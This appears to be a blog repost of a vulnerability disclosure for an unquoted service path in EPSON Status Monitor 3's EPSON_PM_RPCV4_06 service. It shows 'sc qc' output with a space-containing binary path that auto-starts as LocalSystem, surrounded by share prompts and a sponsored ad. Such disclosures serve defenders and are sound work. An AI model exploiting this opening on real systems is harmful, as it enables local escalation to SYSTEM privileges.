Saturday, July 20, 2024

EPSON Status Monitor 3 ‘EPSON_PM_RPCV4_06’ – Unquoted Service Path Exploit

Date: 2020-12-01

CVE: N/A

Platform: WIN

#Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
#Exploit Author : SamAlucard
#Vendor :  SEIKO EPSON Corp
#Version : EPSON_PM_RPCV4_06 8.0
#Vendor Homepage : https://epson.com
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============
C:\>sc qc EPSON_PM_RPCV4_06
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: EPSON_PM_RPCV4_06
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3
SSRP\E_S60RPB.EXE
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : EPSON V3 Service4(06)
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
Bookmark
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  SmartRG Remote Code Execution: SR510n 2.6.13
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

User Avatar
RiSec.Mitch
Just your average information security researcher from Delaware US.

more infosec reads

Subscribe for weekly updates

explore

more

security